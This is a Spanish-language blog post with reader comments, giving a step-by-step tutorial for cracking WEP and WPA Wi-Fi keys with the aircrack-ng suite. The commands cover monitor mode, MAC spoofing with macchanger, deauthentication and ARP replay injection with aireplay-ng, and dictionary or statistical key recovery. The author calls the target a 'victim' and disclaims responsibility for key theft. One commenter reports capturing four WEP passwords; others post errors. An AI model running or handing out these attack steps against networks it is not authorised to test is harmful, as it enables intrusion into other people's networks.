había tenido el blog un poco votado debido a que mi enlace de internet en la casa ya no existe y estoy navegando con un paupérrimo modem 3G que deja harto que desear, pero bueno ese no es el punto, como ahora estoy sin internet estable en casa me vi con un poco de tiempo “extra” y decidi elaborar un tutorial de como crackear redes wireless para probar la seguridad de nuestro Access point o Router Wireless, ahora les aclaro que este tutorial lo hice con fines educativos, si andan robando claves Wi-Fi por ahí es responsabilidad de cada uno…
Vamos al grano, primero debemos tener una distribución linux instalada en nuestro equipo… yo use ubuntu y opensuse pero como se que ubuntu es mas “popular” les explicare como se hace en ubuntu, en todo caso se puede aplicar para cualquier distro, los paquetes son los mismos y básicamente debería ser lo mismo en cualquiera que usen… también cabe mencionar que hay un tema de hardware que influye mucho en que todo pueda salir bien o que la captura de datos tome mas o menos tiempo, yo use un dispositivo wireless atheros AR5001 que funciona a la perfección.
Lo primero es ponerle clave al root de ubuntu, no me gusta el SUDO, ahora si a ti te gusta usar sudo entonces antepone sudo a todos los comandos.
¿Como le damos password al root de ubuntu? Facil:
sudo passwd root
nos pedira la pass de usuario ya que usamos “sudo” y luego nos pedira la nueva password para el usuario root, hecho esto nos logueamos como root:
$ su [enter]
el $ y el [enter] no lo escriban… ahi nos pedira la pass de root, la tipeamos y listo, ya estamos en una consola como root.
Lo segundo seria instalar la suite aircrack-ng:
apt-get install aircrack-ng
Luego instalamos Macchanger:
apt-get install macchanger
Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambrica, dando click derecho en el icono de la red y desactivando la red inalambrica, y abrimos una terminal:
- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR).
airmon-ng start wlan0
- Vemos que nos sale que se activo en mon0, asi es que trabajaremos con mon0
ifconfig mon0 down
-Cambiamos la direccion mac de mon0 por 00:11:22:33:44:55
macchanger -m 00:11:22:33:44:55 mon0
- Damos de alta mon0
ifconfig mon0 up
- Escaneamos las redes disponibles y encontramos a nuestra “víctima” o mas bien dicho nuestro Access point o Router.
airodump-ng mon0
- Detenemos el Scaneo con Control + C
- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima
airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
OJO: hay que borrar los corchetes.
- Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red
- Cambiando los datos de los corchetes por los de nuestra víctima
Para WEP:
aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
Para WPA:
aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0
- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima.
PARA WEP
aireplay-ng -2 -p 0841 -c FFFFFFF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
- Le decimos que si (y) y le damos enter.
PARA WPA
aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
El diccionario deben descargarlo ustedes, ahí tienen para entretenerse buscando en Google o su buscador favorito.
PARA WEP:
- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima.
aircrack-ng -z [nombre red]*.cap
y esperamos a que nos descifre la clave, una ves descifrada con éxito te dará la clave en formato [XX:XX:XX:XX:XX], y activa tu red inalámbrica dando click derecho al icono de la red, Seleccionamos la red crackeada e ingresamos la clave que nos dio de resultado aircrack en formato XXXXXXXXXX.
great!
Ov3r: e da probleas para conectar mi red lan, asi que revise de nuevo y ahora me da estos errores:
Interface Chipset Driver
wlan0 Atheros ath5k – [phy0]SIOCSIFFLAGS: Error desconocido 132
(monitor mode enabled on mon1)
mon0 Atheros ath5k – [phy0]
Lo solucione con esto: The problem persists when I remove and re-add the ath5k module then try again.
$ sudo modprobe -r ath5k
$ sudo modprobe ath5k
$ sudo ifconfig wlan0 down
$ sudo ifconfig wlan0 up
funciona a la perfeccion……. al menos pude capturar 4 password de redes con encriptacion WEP :D
Tengo problemas con :
aireplay-ng -2 -p 0841 -c FFFFFFF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
me sale que
Invalid destination MAC address.
“aireplay-ng –help” for help.
Que significa -c FFFFFFF
Mi tarjeta es Atheros 5001 con chipset AR2425.
Después de seguir todos los pasos, ejecuto el paso de airodump-ng -c [# canal] -w [nombre red] –bssid [direccion MAC] mon0
abro otra terminal y ejecuto
sudo aireplay-ng -1 6000 -a 00:26:44:41:C2:05 -h 00:11:22:33:44:55 mon0
pero me aparece este mensaje:
17:34:10 Waiting for beacon frame (BSSID: 00:26:44:41:C2:05) on channel -1
17:34:11 mon0 is on channel -1, but the AP uses channel 1
¿A qué se debe esto?
He notado que también la red se queda en un valor de paquetes, y no vuelve a subir, o luego desaparece lo último, quedando sólo los títulos de las columnas:
BSSID STATION PWR Rate Lost Packets Probes
00:26:44:41:C2:05 00:A1:B0:F1:7D:75 -90 1 – 1 0 535 redprivada
¿Realmente es Atheros 5001? ¿Tuviste que parchear los drivers?
Si es así, ¿cómo?
Gracias por tu respuesta.